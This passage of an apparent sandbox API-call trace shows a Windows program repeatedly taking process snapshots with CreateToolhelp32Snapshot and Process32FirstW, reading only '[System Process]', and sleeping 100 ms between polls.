(dwFlags=0x2, th32ProcessID=0x0) returned 0x1b8 [0113.414] Process32FirstW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.481] Sleep (dwMilliseconds=0x64) [0113.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bc [0113.582] Process32FirstW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.693] Sleep (dwMilliseconds=0x64) [0113.805] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c0 [0113.810] Process32FirstW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.862] Sleep (dwMilliseconds=0x64) [0113.974] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c4 [0113.978] Process32FirstW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.030] Sleep (dwMilliseconds=0x64) [0114.129] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c8 [0114.133] Process32FirstW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.194] Sleep (dwMilliseconds=0x64) [0114.296] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cc [0114.300] Process32FirstW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.400] Sleep (dwMilliseconds=0x64) [0114.502] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d0 [0114.506] Process32FirstW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.570] Sleep (dwMilliseconds=0x64) [0114.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d4 [0114.690] Process32FirstW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.791] Sleep (dwMilliseconds=0x64) [0114.888] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d8 [0114.893] Process32FirstW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.956] Sleep (dwMilliseconds=0x64) [0115.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dc [0115.079] Process32FirstW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.147] Sleep (dwMilliseconds=0x64) [0115.264] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0115.269] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.375] Sleep (dwMilliseconds=0x64) [0115.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e4 [0115.486] Process32FirstW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.536] Sleep (dwMilliseconds=0x64) [0115.643] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e8 [0115.647] Process32FirstW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.699] Sleep (dwMilliseconds=0x64) [0115.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ec [0115.798] Process32FirstW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.906] Sleep (dwMilliseconds=0x64) [0116.012] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f0 [0116.016] Process32FirstW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.069] Sleep (dwMilliseconds=0x64) [0116.168] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4 [0116.172] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.270] Sleep (dwMilliseconds=0x64) [0116.396] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f8 [0116.400] Process32FirstW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.486] Sleep (dwMilliseconds=0x64) [0116.590] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fc [0116.594] Process32FirstW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.662] Sleep (dwMilliseconds=0x64) [0116.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x200 [0116.784] Process32FirstW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.999] Sleep (dwMilliseconds=0x64) [0117.198] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x204 [0117.202] Process32FirstW (in: hSnapshot=0x204, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.376] Sleep (dwMilliseconds=0x64) [0117.511] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0117.515] Process32FirstW (in: hSnapshot=0x208, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.601] Sleep (dwMilliseconds=0x64) [0117.697] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20c [0117.701] Process32FirstW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.801] Sleep (dwMilliseconds=0x64) [0117.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0117.935] Process32FirstW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.035] Sleep (dwMilliseconds=0x64) [0118.134] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x214 [0118.138] Process32FirstW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.236] Sleep (dwMilliseconds=0x64) [0118.367] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218 [0118.371] Process32FirstW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.475] Sleep (dwMilliseconds=0x64) [0118.570] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21c [0118.574] Process32FirstW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.684] Sleep (dwMilliseconds=0x64) [0118.788] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x220 [0118.793] Process32FirstW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.884] Sleep (dwMilliseconds=0x64) [0119.022] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224 [0119.026] Process32FirstW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.129] Sleep (dwMilliseconds=0x64) [0119.226] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228 [0119.230] Process32FirstW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.332] Sleep (dwMilliseconds=0x64) [0119.459] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22c [0119.463] Process32FirstW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.087] Sleep (dwMilliseconds=0x64) [0120.256] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x230 [0120.260] Process32FirstW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.390] Sleep (dwMilliseconds=0x64) [0120.545] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x234 [0120.549] Process32FirstW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.647] Sleep (dwMilliseconds=0x64) [0120.801] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x238 [0120.805] Process32FirstW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.997] Sleep (dwMilliseconds=0x64) [0121.293] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23c [0121.297] Process32FirstW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.427] Sleep (dwMilliseconds=0x64) [0121.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0121.540] Process32FirstW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.592] Sleep (dwMilliseconds=0x64) [0121.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x244 [0121.695] Process32FirstW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.750] Sleep (dwMilliseconds=0x64) [0121.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x248 [0121.876] Process32FirstW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.942] Sleep (dwMilliseconds=0x64) [0122.081] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24c [0122.085] Process32FirstW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.173] Sleep (dwMilliseconds=0x64) [0122.269] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x250 [0122.274] Process32FirstW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.323] Sleep (dwMilliseconds=0x64) [0122.445] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x254 [0122.449] Process32FirstW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.508] Sleep (dwMilliseconds=0x64) [0122.642] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x258 [0122.646] Process32FirstW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.744] Sleep (dwMilliseconds=0x64) [0122.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x25c [0122.874] Process32FirstW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.931] Sleep (dwMilliseconds=0x64) [0123.057] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x260 [0123.061] Process32FirstW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.112] Sleep (dwMilliseconds=0x64) [0123.219] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x264 [0123.223] Process32FirstW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.272] Sleep (dwMilliseconds=0x64) [0123.375] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x268 [0123.379] Process32FirstW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.429] Sleep (dwMilliseconds=0x64) [0123.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x26c [0123.535] Process32FirstW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.584] Sleep (dwMilliseconds=0x64) [0123.687] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x270 [0123.690] Process32FirstW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.741] Sleep (dwMilliseconds=0x64) [0123.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x274 [0123.846] Process32FirstW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.908] Sleep (dwMilliseconds=0x64) [0124.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x278 [0124.019] Process32FirstW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.068] Sleep (dwMilliseconds=0x64) [0124.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x27c [0124.174] Process32FirstW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.225] Sleep (dwMilliseconds=0x64) [0124.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x280 [0124.331] Process32FirstW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.382] Sleep (dwMilliseconds=0x64) [0124.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x284 [0124.486] Process32FirstW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.537] Sleep (dwMilliseconds=0x64) [0124.638] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x288 [0124.642] Process32FirstW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.692] Sleep (dwMilliseconds=0x64) [0124.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x28c [0124.798] Process32FirstW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.848] Sleep (dwMilliseconds=0x64) [0124.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x290 [0124.955] Process32FirstW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.028] Sleep (dwMilliseconds=0x64) [0125.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0125.126] Process32FirstW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.175] Sleep (dwMilliseconds=0x64) [0125.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x298 [0125.283] Process32FirstW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.334] Sleep (dwMilliseconds=0x64) [0125.434] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x29c [0125.438] Process32FirstW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.488] Sleep (dwMilliseconds=0x64) [0125.590] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2a0 [0125.594] Process32FirstW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.653] Sleep (dwMilliseconds=0x64) [0125.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2a4 [0125.766] Process32FirstW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, 